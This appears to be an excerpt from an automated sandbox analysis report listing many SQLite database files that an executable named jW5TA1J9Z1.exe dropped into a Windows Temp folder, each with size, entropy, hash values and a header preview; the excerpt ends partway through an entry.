                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LryPITQAxe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\LusCzzhjcg

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MCGNwF6nlc

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MJtik4gddJ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MZhCka5zuo

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MarbXV65P4

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\McUR99RPHi

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MoIZw027zk

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MwIOh5wmMP

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\MxkctFCXz7

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\N0Ck19gFNS

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NEIoHPjTcx

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NWepkMJlw2

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NZndf95WTy

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NdFNjUY48s

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\NftrR0P6Sr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Nw0Np60gcf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\O06b8cWA8R

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\O2st80WZ8y

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\OGu6r9fO8i

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\OKmfjocFte

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\OKyb6CT7Pd

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\OMkNg2nKzK

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\ON8AMDnGAl

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
